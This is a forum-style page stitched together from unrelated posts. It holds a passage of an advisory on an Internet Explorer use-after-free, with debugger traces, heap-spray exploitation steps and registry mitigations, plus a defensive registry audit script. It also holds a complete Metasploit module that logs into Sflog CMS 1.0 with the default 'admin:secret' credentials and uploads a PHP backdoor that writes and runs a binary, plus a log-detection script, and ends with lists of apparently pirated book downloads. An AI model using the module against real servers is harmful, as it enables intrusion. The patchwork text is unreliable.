    6d42c695 MSHTML!CDoc::NewDwnCtx2+0x30a
    6d953c33 MSHTML!CDoc::NewDwnCtx+0x5b
    6d956222 MSHTML!CEmbeddedFontFace::EnsureStartDownload+0x120
    6d955aee MSHTML!CFontFace::CFontFaceSrc::EnsureStartDownload+0x8a
    6d682c20 MSHTML!CFontFace::AddToFamily+0x18c
    6d52ceb2 MSHTML!CStyleSheetArray::BuildFontFaceRuleFamily+0x58
    6d52cd28 MSHTML!ApplyClear+0x113
    6d51bc41 MSHTML!ApplyFontFace+0x1d4
    6d40e103 MSHTML!ApplyFormatInfoProperty+0x33bf
    6d40e424 MSHTML!ApplyAttrArrayValues+0x2bd
    6d5b5344 MSHTML!CStyleSheetArray::Apply+0x34a
    6d47bad8 MSHTML!CMarkup::ApplyStyleSheets+0x6a
    6d47b89e MSHTML!CElement::ApplyStyleSheets+0x4a2
    6d4cddff MSHTML!CElement::ApplyDefaultFormat+0x8b
    6d47b5a0 MSHTML!CBlockElement::ApplyDefaultFormat+0x379
    6d47a5a3 MSHTML!CElement::ComputeFormatsVirtual+0x1a1e
    6d47a4d6 MSHTML!CElement::ComputeFormats+0xe1
    6d47bd39 MSHTML!CTreeNode::ComputeFormats+0xba
    6d482d33 MSHTML!CTreeNode::ComputeFormatsHelper+0x40
    6d360862 MSHTML!CTreeNode::GetFancyFormat+0x32
    6d2d910f MSHTML!CElement::UpdateFormats+0x426
    6d4ce10f MSHTML!CControlledFormatter::Init+0xcc
    6d47fa14 MSHTML!CElement::OnPropertyChangeInternal+0x3fa
    6d49b76b MSHTML!CElement::OnPropertyChange+0x1b
    6d2da8db MSHTML!BASICPROPPARAMS::SetStringProperty+0x36a
    6d0084d6 MSHTML!CFastDOM::CHTMLElement::Trampoline_Set_className+0x61
    6d0cc04d JSCRIPT9!Js::JavascriptFunction::CallFunction+0xc4
    6d0cc968 JSCRIPT9!Js::JavascriptExternalFunction::ExternalFunctionThunk+0x117
    6d009a85 JSCRIPT9!Js::JavascriptOperators::SetProperty+0x8c
    6d009a2c JSCRIPT9!Js::JavascriptOperators::OP_SetProperty+0x59
    039507b8 JSCRIPT9!Js::JavascriptOperators::PatchPutValueNoLocalFastPath+0xbc
    6d0084d6 0x39507b8
    6d0083fb JSCRIPT9!Js::JavascriptFunction::CallFunction+0xc4
    6d008332 JSCRIPT9!Js::JavascriptFunction::CallRootFunction+0xb6
    6d0082be JSCRIPT9!ScriptSite::CallRootFunction+0x4f
    6d0cf12c JSCRIPT9!ScriptSite::Execute+0x63
    6d4f24d1 JSCRIPT9!ScriptEngine::Execute+0x11a
    6d4f23fb MSHTML!CListenerDispatch::InvokeVar+0x12a
    6d54ce40 MSHTML!CListenerDispatch::Invoke+0x40
    6d44e624 MSHTML!CEventMgr::_InvokeListeners+0x187
    6d54cf37 MSHTML!CEventMgr::_InvokeListenersOnWindow+0xcc
    6d5db67d MSHTML!CEventMgr::Dispatch+0x3cc
    6d53ba32 MSHTML!CEventMgr::DispatchFocusEvent+0x7d
    6d5e6f74 MSHTML!COmWindowProxy::Fire_onfocus+0x84
    6d5e6ff1 MSHTML!CAsyncEventQueue::DispatchAllEvents+0x7c
    7748c4e7 MSHTML!GlobalWndProc+0x2ed
    7748c5e7 USER32!InternalCallWinProc+0x23
    7748cc19 USER32!UserCallWinProcCheckWow+0x14b
    7748cc70 USER32!DispatchMessageWorker+0x35e
    6e8e1b44 USER32!DispatchMessageW+0xf
    6e901a16 IEFRAME!CTabWindow::_TabWindowThreadProc+0x722
    759315b0 IEFRAME!LCIETab_ThreadProc+0x317
    6e8efd5b IERTUTIL!CIsoScope::RegisterThread+0xab
    75c4ed6c IEFRAME!Detour_DefWindowProcA+0x6c
    773737f5 KERNEL32!BaseThreadInitThunk+0xe
    773737c8 NTDLL!__RtlUserThreadStart+0x70
    00000000 NTDLL!_RtlUserThreadStart+0x1b

As long as the message box remains open, its message loop will dispatch new window message-mediated events, and control won't return to Internet Explorer's original message loop. It doesn't matter which message loop is dispatching messages, because the same window procedure is executed in either case. The only problem is that the code lower on the call stack was operating on various heap objects (such as the CTreePos allocated earlier) before control entered the MessageBox call and became stuck. Now, if a window message-mediated event results in the execution of Javascript that modifies or destroys those heap objects, corruption manifesting as a use-after-free, for instance, may result. As belabored in the Vulnerability Details section, not every type of event can be "stacked" in every situation like this, but certain different events can.
An 0x8003 window message (for "body.onfocus") was being processed during the bottom message loop, so if an 0x8002 window message is posted, it will be processed during the top message loop--and this is exactly what the example has arranged to happen. Once the delay in serving "slow.js" elapses, an 0x8002 window message-mediated event (referred to as a "method call") corresponding to the concluded download will be posted and subsequently processed during the top message loop. This method call executes the created script element's "onreadystatechange" event handler, which destroys the very "div" element that was in the process of being rendered when Internet Explorer attempted to download the font and became stuck at the message box. The following partial call stack shows "removeChild" being called from the "onreadystatechange" event handler: 6d2eb4e3 MSHTML!CElement::ie9_removeChild 6d0084d6 MSHTML!CFastDOM::CNode::Trampoline_removeChild+0x7b 6d0cc04d JSCRIPT9!Js::JavascriptFunction::CallFunction+0xc4 039501af JSCRIPT9!Js::JavascriptExternalFunction::ExternalFunctionThunk+0x117 6d0084d6 0x39501af 6d0083fb JSCRIPT9!Js::JavascriptFunction::CallFunction+0xc4 6d008332 JSCRIPT9!Js::JavascriptFunction::CallRootFunction+0xb6 6d0082be JSCRIPT9!ScriptSite::CallRootFunction+0x4f 6d0cf12c JSCRIPT9!ScriptSite::Execute+0x63 6d4f24d1 JSCRIPT9!ScriptEngine::Execute+0x11a 6d4f23fb MSHTML!CListenerDispatch::InvokeVar+0x12a 6d35a726 MSHTML!CListenerDispatch::Invoke+0x40 6d5db834 MSHTML!CEventMgr::Dispatch+0x537 6d4a5607 MSHTML!CEventMgr::DispatchEvent+0xc9 6d4a02ff MSHTML!CElement::Fire_onreadystatechange+0x99 6d5a9d09 MSHTML!CScriptElement::FireOnReadyStateChange+0x3e 6d5c9368 MSHTML!GlobalWndOnMethodCall+0x115 7748c4e7 MSHTML!GlobalWndProc+0x302 7748c5e7 USER32!InternalCallWinProc+0x23 7748cc19 USER32!UserCallWinProcCheckWow+0x14b 7748cc70 USER32!DispatchMessageWorker+0x35e 774a38d7 USER32!DispatchMessageW+0xf 774a3b27 USER32!DialogBox2+0x15a 774ce0d5 USER32!InternalDialogBox+0xcb 
774ce659 USER32!SoftModalMessageBox+0x68a 774ce78c USER32!MessageBoxWorker+0x2ca 774cea08 USER32!MessageBoxTimeoutW+0x7f 6ea15e86 USER32!MessageBoxExW+0x1b 774ceaa4 IEFRAME!Detour_MessageBoxExW+0x47 6db3ac94 USER32!MessageBoxW+0x45 6db3aaf1 MSHTML!CMailtoProtocol::DisplayMailClientNotFoundError+0x10b 6db3a2cc MSHTML!CMailtoProtocol::RunMailClient+0x12e 6db39def MSHTML!CMailtoProtocol::ParseAndBind+0x8b 76ab1c0b MSHTML!CMailtoProtocol::Start+0xcd ... The free actually happens in a subsequent method call, which is also processing during the MessageBox message loop, as shown in the following partial call stack: 75c4c3d4 kernel32!HeapFree+0x00000014 6d5eebed MSHTML!CTreePos::Release+0x00000046 6d5fdc69 MSHTML!CLayoutBlock::~CLayoutBlock+0x000000ba 6d5ff5da MSHTML!CFlexBoxBlock::`scalar deleting destructor'+0x00000013 6d559ee9 MSHTML!TSmartPointer<CPtsPelParaclient>::~TSmartPointer<CPtsPelParaclient>+0x00000014 6d5da773 MSHTML!HtmlLayout::SmartDispClient::Release+0x00000023 6d5da5fb MSHTML!HtmlLayout::FlowBox::ImplicitDestructor+0x0000001d 6d490144 MSHTML!HtmlLayout::CIE9DocumentLayout::FormatPage+0x00000065 6d48c517 MSHTML!CCssDocumentLayout::FindOrFormatPage+0x00000272 6d4872fb MSHTML!CCssDocumentLayout::GetPage+0x00000964 6d48e06f MSHTML!CMarkupPageLayout::CalcSize+0x0000028c 6d48de82 MSHTML!CMarkupPageLayout::CalcTopLayoutSize+0x00000101 6d48fba1 MSHTML!CMarkupPageLayout::DoLayout+0x00000056 6d47e65a MSHTML!CView::ExecuteLayoutTasks+0x00000034 6d476a85 MSHTML!CView::EnsureView+0x000003bf 6d498701 MSHTML!CView::EnsureViewCallback+0x000000b8 6d5a9d09 MSHTML!GlobalWndOnMethodCall+0x00000115 6d5c9368 MSHTML!GlobalWndProc+0x00000302 7748c4e7 USER32!InternalCallWinProc+0x00000023 7748c5e7 USER32!UserCallWinProcCheckWow+0x0000014b 7748cc19 USER32!DispatchMessageWorker+0x0000035e 7748cc70 USER32!DispatchMessageW+0x0000000f 774a38d7 USER32!DialogBox2+0x0000015a 774a3b27 USER32!InternalDialogBox+0x000000cb 774ce0d5 USER32!SoftModalMessageBox+0x0000068a 774ce659 
USER32!MessageBoxWorker+0x000002ca 774ce78c USER32!MessageBoxTimeoutW+0x0000007f ... At this point, a fully developed exploit might use Javascript to reallocate and overwrite the memory formerly belonging to the now-freed CTreePos. For the sake of this walkthrough, it suffices to let page heap wipe the freed memory of the CTreePos with 0xF0. Finally, once the user closes the message box, execution of the interrupt font downloading and page rendering code continues, but the code fails to anticipate that the program state has changed during the MessageBox call. A pointer on the stack to the destroyed CTreePos is dereferenced, resulting in an access violation. The following register dump, disassembly, and call stack illustrate; notice that EBX points to stack memory from which a pointer to the destroyed CTreePos is taken: Access violation - code c0000005 (first chance) eax=005ba430 ebx=03b5c5c8 ecx=f0f0f0f0 edx=03b5c540 esi=00000000 edi=00557840 eip=6d47b5d7 esp=03b5c450 ebp=03b5c510 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246 MSHTML!CElement::ComputeFormatsVirtual+0x1a64: 6d47b5d7 0fbf4120 movsx eax,word ptr [ecx+20h] ds:0023:f0f0f110=???? 
6d47b5c5 8b03 mov eax,dword ptr [ebx] 6d47b5c7 8b8bd4000000 mov ecx,dword ptr [ebx+0D4h] 6d47b5cd 89442420 mov dword ptr [esp+20h],eax 6d47b5d1 894c242c mov dword ptr [esp+2Ch],ecx 6d47b5d5 8b08 mov ecx,dword ptr [eax] 6d47b5d7 0fbf4120 movsx eax,word ptr [ecx+20h] 6d47a5a3 MSHTML!CElement::ComputeFormatsVirtual+0x1a64 6d47a4d6 MSHTML!CElement::ComputeFormats+0xe1 6d47bd39 MSHTML!CTreeNode::ComputeFormats+0xba 6d482d33 MSHTML!CTreeNode::ComputeFormatsHelper+0x40 6d360862 MSHTML!CTreeNode::GetFancyFormat+0x32 6d2d910f MSHTML!CElement::UpdateFormats+0x426 6d4ce10f MSHTML!CControlledFormatter::Init+0xcc 6d47fa14 MSHTML!CElement::OnPropertyChangeInternal+0x3fa 6d49b76b MSHTML!CElement::OnPropertyChange+0x1b 6d2da8db MSHTML!BASICPROPPARAMS::SetStringProperty+0x36a 6d0084d6 MSHTML!CFastDOM::CHTMLElement::Trampoline_Set_className+0x61 6d0cc04d JSCRIPT9!Js::JavascriptFunction::CallFunction+0xc4 6d0cc968 JSCRIPT9!Js::JavascriptExternalFunction::ExternalFunctionThunk+0x117 6d009a85 JSCRIPT9!Js::JavascriptOperators::SetProperty+0x8c 6d009a2c JSCRIPT9!Js::JavascriptOperators::OP_SetProperty+0x59 039507b8 JSCRIPT9!Js::JavascriptOperators::PatchPutValueNoLocalFastPath+0xbc 6d0084d6 0x39507b8 6d0083fb JSCRIPT9!Js::JavascriptFunction::CallFunction+0xc4 6d008332 JSCRIPT9!Js::JavascriptFunction::CallRootFunction+0xb6 6d0082be JSCRIPT9!ScriptSite::CallRootFunction+0x4f 6d0cf12c JSCRIPT9!ScriptSite::Execute+0x63 6d4f24d1 JSCRIPT9!ScriptEngine::Execute+0x11a 6d4f23fb MSHTML!CListenerDispatch::InvokeVar+0x12a 6d54ce40 MSHTML!CListenerDispatch::Invoke+0x40 6d44e624 MSHTML!CEventMgr::_InvokeListeners+0x187 6d54cf37 MSHTML!CEventMgr::_InvokeListenersOnWindow+0xcc 6d5db67d MSHTML!CEventMgr::Dispatch+0x3cc 6d53ba32 MSHTML!CEventMgr::DispatchFocusEvent+0x7d 6d5e6f74 MSHTML!COmWindowProxy::Fire_onfocus+0x84 6d5e6ff1 MSHTML!CAsyncEventQueue::DispatchAllEvents+0x7c 7748c4e7 MSHTML!GlobalWndProc+0x2ed 7748c5e7 USER32!InternalCallWinProc+0x23 7748cc19 USER32!UserCallWinProcCheckWow+0x14b 7748cc70 
USER32!DispatchMessageWorker+0x35e 6e8e1b44 USER32!DispatchMessageW+0xf 6e901a16 IEFRAME!CTabWindow::_TabWindowThreadProc+0x722 759315b0 IEFRAME!LCIETab_ThreadProc+0x317 6e8efd5b IERTUTIL!CIsoScope::RegisterThread+0xab 75c4ed6c IEFRAME!Detour_DefWindowProcA+0x6c 773737f5 KERNEL32!BaseThreadInitThunk+0xe 773737c8 NTDLL!__RtlUserThreadStart+0x70 00000000 NTDLL!_RtlUserThreadStart+0x1b EXPLOITATION ------------ Exploitation of this vulnerability is typical for a basic use-after-free condition in Internet Explorer, in that the exploit: (1) creates an object on the heap, (2) causes the object to be freed while references to it persist elsewhere, (3) replaces the contents of the heap memory formerly occupied by the object with arbitrary data, and (4) causes Internet Explorer to access a stale reference to the freed object. In a prepared proof-of-concept EIP control exploit targeting Internet Explorer 9 (32-bit), these steps were accomplished by: including two nested, named "div" elements in the HTML; modifying the outer "div" element to destroy the inner "div" (while the mail client error message is on the screen); performing a typical heap spray to store known data at a known address; and creating a large number of CTreePos-size heap blocks containing specially crafted data to fill the hole left by the freed inner "div" element. The specially crafted data includes a substitute vtable pointer which references heap-sprayed data at a hard-coded address, another feature typical of such exploits. The only step that this exploit cannot accomplish entirely on its own is triggering Internet Explorer to access the stale inner "div" element reference--this access occurs only after the user dismisses the mail client error message. 
MITIGATION
----------

Setting the "Downloads" -> "Font download" security setting to "Disable" ("HKEY_CURRENT_USER\Software\Microsoft\CurrentVersion\Internet Settings\Zones\<zone-identifier>" -> "1604": REG_DWORD = "3") prevents exploitation of this vulnerability using the present technique.

Deleting, renaming, or denying read access to the "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\mailto" registry key (and "HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Classes\PROTOCOLS\Handler\mailto" as appropriate) also prevents exploitation using the present technique; however, after implementing the workaround, confirm that clicking a "mailto:" link in any zone does not display a message box.

CONCLUSION
----------

This document presents a long-lived vulnerability in Internet Explorer which permits arbitrary code execution given default security settings. Although current exploitation involves a modest amount of user interaction and user notification in the form of a mail client error message, the message is not security-related, and the message box does not present the user with an option of aborting exploitation. Further research into the vulnerability might reveal other means of exploitation which may change the presented message or reduce or eliminate the need for user interaction.

GREETINGS
---------

www.thetomatopizza.com
^ The best pizza anywhere near DFW; required eating for locals and remotes.

http://packetstormsecurity.org/files/116320/Internet-Explorer-Script-Interjection-Code-Execution.html
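An offline check for the two workarounds in the MITIGATION section, as an added example that is not part of the advisory or the original post: it reads `reg export` text and reports, per zone, whether value "1604" is 3 and whether a "mailto" protocol handler key is still present. The sample export is constructed, and the zone key is written with the standard `...\Microsoft\Windows\CurrentVersion\...` path as an assumption of this example.

```python
import re

# Assumption: per-user zone settings live under the standard key below.
# Zone ids: 0 My Computer, 1 Local intranet, 2 Trusted sites,
# 3 Internet, 4 Restricted sites.
ZONES_KEY = (r"HKEY_CURRENT_USER\Software\Microsoft\Windows"
             r"\CurrentVersion\Internet Settings\Zones")
MAILTO_KEYS = (
    r"HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\mailto",
    r"HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Classes\PROTOCOLS\Handler\mailto",
)
FONT_DOWNLOAD = "1604"  # "Downloads" -> "Font download"
DISABLE = 3             # REG_DWORD 3 = "Disable"

# Constructed sample of `reg export` output (already decoded to text).
SAMPLE_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
"1604"=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4]
"1604"=dword:00000003

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\mailto]
"""


def parse_reg_export(text):
    """Return {lowercased key path: {value name: raw data}}."""
    keys, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            current = keys.setdefault(line[1:-1].lower(), {})
        elif current is not None:
            m = re.match(r'"([^"]+)"=(.*)$', line)
            if m:
                current[m.group(1)] = m.group(2).strip()
    return keys


def audit(text, zones=(1, 2, 3, 4)):
    """Report the state of both workarounds found in the export text."""
    keys = parse_reg_export(text)
    zone_state = {}
    for zone in zones:
        values = keys.get(f"{ZONES_KEY}\\{zone}".lower(), {})
        m = re.fullmatch(r"dword:([0-9a-fA-F]{8})",
                         values.get(FONT_DOWNLOAD, ""))
        if m is None:
            # No per-user value in this export; the effective setting then
            # comes from defaults or policy and must be checked there.
            zone_state[zone] = "not set"
        elif int(m.group(1), 16) == DISABLE:
            zone_state[zone] = "disabled"
        else:
            zone_state[zone] = "allowed"
    return {
        "zones": zone_state,
        "font_download_blocked": all(s == "disabled"
                                     for s in zone_state.values()),
        # A key that is still exported means the mailto workaround is absent.
        "mailto_handlers_present": [k for k in MAILTO_KEYS
                                    if k.lower() in keys],
    }


if __name__ == "__main__":
    report = audit(SAMPLE_EXPORT)
    for zone, state in sorted(report["zones"].items()):
        print(f"zone {zone}: font download {state}")
    print("mailto handlers present:", report["mailto_handlers_present"])
```

An export that does not cover HKEY_LOCAL_MACHINE will show no "mailto" handler keys, so export both hives before relying on that part of the report.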
-
This Metasploit module exploits multiple design flaws in Sflog 1.0. By default, the CMS has a default admin credential of "admin:secret", which can be abused to access administrative features such as blogs management. Through the management interface, we can upload a backdoor that's accessible by any remote user, and then gain arbitrary code execution.

```ruby
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::HttpClient
	include Msf::Exploit::EXE

	def initialize(info={})
		super(update_info(info,
			'Name' => "Sflog! CMS 1.0 Arbitrary File Upload Vulnerability",
			'Description' => %q{
				This module exploits multiple design flaws in Sflog 1.0. By default, the CMS has
				a default admin credential of "admin:secret", which can be abused to access
				administrative features such as blogs management. Through the management
				interface, we can upload a backdoor that's accessible by any remote user, and then
				gain arbitrary code execution.
			},
			'License' => MSF_LICENSE,
			'Author' =>
				[
					'dun', #Discovery, PoC
					'sinn3r' #Metasploit
				],
			'References' =>
				[
					['OSVDB', '83767'],
					['EDB', '19626']
				],
			'Payload' =>
				{
					'BadChars' => "\x00"
				},
			'DefaultOptions' =>
				{
					'ExitFunction' => "none"
				},
			'Platform' => ['linux', 'php'],
			'Targets' =>
				[
					[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
					[ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]
				],
			'Privileged' => false,
			'DisclosureDate' => "Jul 06 2012",
			'DefaultTarget' => 0))

		register_options(
			[
				OptString.new('TARGETURI', [true, 'The base directory to sflog!', '/sflog/']),
				OptString.new('USERNAME', [true, 'The username to login with', 'admin']),
				OptString.new('PASSWORD', [true, 'The password to login with', 'secret'])
			], self.class)
	end

	def check
		target_uri.path << '/' if target_uri.path[-1,1] != '/'
		base = File.dirname("#{target_uri.path}.")

		res = send_request_raw({'uri'=>"#{base}/index.php"})

		if not res
			return Exploit::CheckCode::Unknown
		elsif res and res.body =~ /\<input type\=\"hidden\" name\=\"sitesearch\" value\=\"www\.thebonnotgang\.com\/sflog/
			return Exploit::CheckCode::Detected
		else
			return Exploit::CheckCode::Safe
		end
	end

	#
	# Embed our binary in PHP, and then extract/execute it on the host.
	#
	def get_write_exec_payload(fname, data)
		p = Rex::Text.encode_base64(generate_payload_exe)
		php = %Q|
		<?php
		$f = fopen("#{fname}", "wb");
		fwrite($f, base64_decode("#{p}"));
		fclose($f);
		exec("chmod 777 #{fname}");
		exec("#{fname}");
		?>
		|
		php = php.gsub(/^\t\t/, '').gsub(/\n/, ' ')
		return php
	end

	def on_new_session(cli)
		if cli.type == "meterpreter"
			cli.core.use("stdapi") if not cli.ext.aliases.include?("stdapi")
		end

		@clean_files.each do |f|
			print_status("#{@peer} - Removing: #{f}")
			begin
				if cli.type == 'meterpreter'
					cli.fs.file.rm(f)
				else
					cli.shell_command_token("rm #{f}")
				end
			rescue ::Exception => e
				print_error("#{@peer} - Unable to remove #{f}: #{e.message}")
			end
		end
	end

	#
	# login unfortunately is needed, because we need to make sure blogID is set, and the upload
	# script (uploadContent.inc.php) doesn't actually do that, even though we can access it
	# directly.
	#
	def do_login(base)
		res = send_request_cgi({
			'method' => 'POST',
			'uri' => "#{base}/admin/login.php",
			'vars_post' => {
				'userID' => datastore['USERNAME'],
				'password' => datastore['PASSWORD']
			}
		})

		if res and res.headers['Set-Cookie'] =~ /PHPSESSID/ and res.body !~ /\<i\>Access denied\!\<\/i\>/
			return res.headers['Set-Cookie']
		else
			return ''
		end
	end

	#
	# Upload our payload, and then execute it.
	#
	def upload_exec(cookie, base, php_fname, p)
		data = Rex::MIME::Message.new
		data.add_part('download', nil, nil, "form-data; name=\"blogID\"")
		data.add_part('7', nil, nil, "form-data; name=\"contentType\"")
		data.add_part('3000', nil, nil, "form-data; name=\"MAX_FILE_SIZE\"")
		data.add_part(p, 'text/plain', nil, "form-data; name=\"fileID\"; filename=\"#{php_fname}\"")

		# The app doesn't really like the extra "\r\n", so we need to remove the newline.
		post_data = data.to_s
		post_data = post_data.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

		print_status("#{@peer} - Uploading payload (#{p.length.to_s} bytes)...")
		res = send_request_cgi({
			'method' => 'POST',
			'uri' => "#{base}/admin/manage.php",
			'ctype' => "multipart/form-data; boundary=#{data.bound}",
			'data' => post_data,
			'cookie' => cookie,
			'headers' => {
				'Referer' => "http://#{rhost}#{base}/admin/manage.php",
				'Origin' => "http://#{rhost}"
			}
		})

		if not res
			print_error("#{@peer} - No response from host")
			return
		end

		target_path = "#{base}/blogs/download/uploads/#{php_fname}"
		print_status("#{@peer} - Requesting '#{target_path}'...")
		res = send_request_raw({'uri'=>target_path})
		if res and res.code == 404
			print_error("#{@peer} - Upload unsuccessful: #{res.code.to_s}")
			return
		end

		handler
	end

	def exploit
		@peer = "#{rhost}:#{rport}"

		target_uri.path << '/' if target_uri.path[-1,1] != '/'
		base = File.dirname("#{target_uri.path}.")

		print_status("#{@peer} - Attempt to login as '#{datastore['USERNAME']}:#{datastore['PASSWORD']}'")
		cookie = do_login(base)

		if cookie.empty?
			print_error("#{@peer} - Unable to login")
			return
		end

		php_fname = "#{Rex::Text.rand_text_alpha(5)}.php"
		@clean_files = [php_fname]

		case target['Platform']
		when 'php'
			p = "<?php #{payload.encoded} ?>"
		when 'linux'
			bin_name = "#{Rex::Text.rand_text_alpha(5)}.bin"
			@clean_files << bin_name
			bin = generate_payload_exe
			p = get_write_exec_payload("/tmp/#{bin_name}", bin)
		end

		upload_exec(cookie, base, php_fname, p)
	end
end
```

http://packetstormsecurity.org/files/116328/Sflog-CMS-1.0-Arbitrary-File-Upload.html
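Detection logic for the request pattern this module leaves in a web server access log, as an added example that is not part of the module or the original post: a POST to "admin/manage.php" followed by a request for a ".php" file under a blog's "uploads" directory. The log lines are constructed, the combined log format is assumed, and matching any blogID (the module uses "download") is an assumption of this example.

```python
import re
from datetime import datetime, timedelta

# Apache/nginx "combined"-style access log line (assumed format).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})\b')
# The management page the upload is posted to.
MANAGE_POST = re.compile(r"/admin/manage\.php(?:\?|$)")
# Uploaded files are served from blogs/<blogID>/uploads/; a script file there
# should never be requested in normal use.
UPLOADED_PHP = re.compile(r"/blogs/[^/]+/uploads/[^/?]+\.php(?:\?|$)", re.I)

# Constructed sample log lines (documentation IP ranges).
SAMPLE_LOG = [
    '203.0.113.7 - - [06/Jul/2012:10:00:01 +0000] "POST /sflog/admin/login.php HTTP/1.1" 200 512',
    '203.0.113.7 - - [06/Jul/2012:10:00:02 +0000] "POST /sflog/admin/manage.php HTTP/1.1" 200 2048',
    '203.0.113.7 - - [06/Jul/2012:10:00:03 +0000] "GET /sflog/blogs/download/uploads/aBcDe.php HTTP/1.1" 200 0',
    '198.51.100.9 - - [06/Jul/2012:11:30:00 +0000] "GET /sflog/blogs/download/uploads/aBcDe.php HTTP/1.1" 200 0',
    '192.0.2.10 - - [06/Jul/2012:11:31:00 +0000] "GET /sflog/blogs/download/uploads/photo.jpg HTTP/1.1" 200 9000',
    '192.0.2.10 - - [06/Jul/2012:11:32:00 +0000] "GET /sflog/blogs/download/uploads/zzzzz.php HTTP/1.1" 404 300',
]


def detect(lines, window=timedelta(minutes=10)):
    """Return alerts for PHP files served from an uploads directory.

    Severity is "high" when the request follows a manage.php POST within
    `window`, otherwise "medium". The uploaded file is reachable by any
    remote user, so the requester is not required to be the uploader.
    """
    alerts, last_upload = [], None  # last_upload = (time, client ip)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        if m["method"] == "POST" and MANAGE_POST.search(m["path"]):
            last_upload = (ts, m["ip"])
            continue
        # A 404 means no such file was stored, so it is not reported.
        if UPLOADED_PHP.search(m["path"]) and m["status"] != "404":
            recent = (last_upload is not None
                      and ts - last_upload[0] <= window)
            alerts.append({
                "time": ts.isoformat(),
                "client": m["ip"],
                "path": m["path"],
                "severity": "high" if recent else "medium",
                "uploader": last_upload[1] if recent else None,
            })
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```

Access logs do not record the credentials used at "admin/login.php", so whether "admin:secret" is still valid has to be checked in the application itself.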
-
2-3 weeks later
-
Many happy returns !!!
-
Download : Apress.Beginning.SQL.Server.2012.Administration.May.2012.epub download - 2shared Download : CSS_XHTML_JavaScript.pdf download - 2shared Download : Manual HTML5.pdf download - 2shared Download : PHP Advanced Ajax Architecture and Best Practices.pdf download - 2shared Download : http://www.2shared.com/file/dfoyzPZv/MSPress101MicrosoftVisualBasic.html Download : http://www.2shared.com/document/nqT1nb7s/OReillyXSLT2ndEditionJul2008.html Download : http://www.2shared.com/document/NZUUJrzy/Creat_Ecommerce_Site.html EDIT Download : http://www.2shared.com/document/CCm6MgmP/C_online.html Download : http://www.2shared.com/file/6thWtLzu/C3ecode20110520.html Download : http://www.2shared.com/document/NqOAJnuy/Java_Learning_to_programming_w.html Download : http://www.2shared.com/file/vnILc8ga/oopj.html Download : http://www.2shared.com/document/OyOtKDIy/php_reference_-_beginner_to_in.html Download : http://www.2shared.com/document/8vsMdixa/practical-php-testing.html EDIT Download : http://www.2shared.com/document/qwsmqIGJ/Pro_NET.html EDIT Abobe Flash / Photoshop : Download : http://www.2shared.com/document/ORCGzp11/Adobe_-_Photoshop_6_Bible.html Download : http://www.2shared.com/document/VRbnOyGj/Advanced_Photoshop_Techniques.html Download : http://www.2shared.com/document/NblJ961U/Flash_MX_-_actionscript_standa.html Download : http://www.2shared.com/document/W29YQ3j6/flash_mx2004_introduction.html Java : Download : http://www.2shared.com/document/zLlpg7aX/Java_language_-_Specification_.html Download : http://www.2shared.com/document/qmx0FlA3/AgilexMethodology.html Download : http://www.2shared.com/document/sd4aStT6/JavaGramGuide.html Download : http://www.2shared.com/document/6bHnVBq7/Java_for_the_Beginning_Program.html Download : http://www.2shared.com/document/oHYrgCbb/Mastering_-_JAVA.html http://alvinalexander.com/java/java_oo/java_oo.shtml Perl : Download : http://www.2shared.com/document/W_fkTP_A/First_stem_in_Perl.html Download : 
http://www.2shared.com/document/ZszAHUZN/Perl_-_Working_with_simple_val.html Download : http://www.2shared.com/document/yyV7daCa/Perl_-_lists_and_hashes.html Download : http://www.2shared.com/document/9uxaconG/Perl_-_Loops_and_deisions.html Download : http://www.2shared.com/document/eUn5MBl5/Perl_-_Regular_expression.html Download : http://www.2shared.com/document/h5mVz741/Perl_-_Files_and_data.html Download : http://www.2shared.com/document/doUwyTIv/Perl_-_Database.html Download : http://www.2shared.com/document/vem22Kkn/Perl_-_INDEX.html Download : http://www.2shared.com/document/XZbMrM2J/Perl_-_Introduction_to_CGI.html Download : http://www.2shared.com/document/FxWD6HeE/Perl_-_Modules.html Download : http://www.2shared.com/document/xgCg2Oon/Perl_-_Object_oriented.html Download : http://www.2shared.com/document/deNCMpe5/Perl_-_References.html Download : http://www.2shared.com/document/_shhP3-5/Perl_-_Running_and_debugging.html Download : http://www.2shared.com/document/8B4r7Jr-/Perl_-_Subroutines.html Download : http://www.2shared.com/document/qMdTTw4Q/Perl_-_The_world_of_perl.html Download : http://www.2shared.com/document/gUGL_DwF/Perl_A_-_Regular_expresion.html Download : http://www.2shared.com/document/2Jh7S3R6/Perl_B_-_Special_variables.html Download : http://www.2shared.com/document/IPRrUCbl/Perl_C_-_Function_references.html Download : http://www.2shared.com/document/p2QxH8Yh/Perl_D_-_Standard_modules.html Download : http://www.2shared.com/document/NvfkjN_X/Perl_E_-_command_line_referenc.html Download : http://www.2shared.com/document/ivB9Py8j/Perl_F_-_ASCII_character_set.html Download : http://www.2shared.com/document/Pnqa3jDD/Perl_G_-_Licenses.html Download : 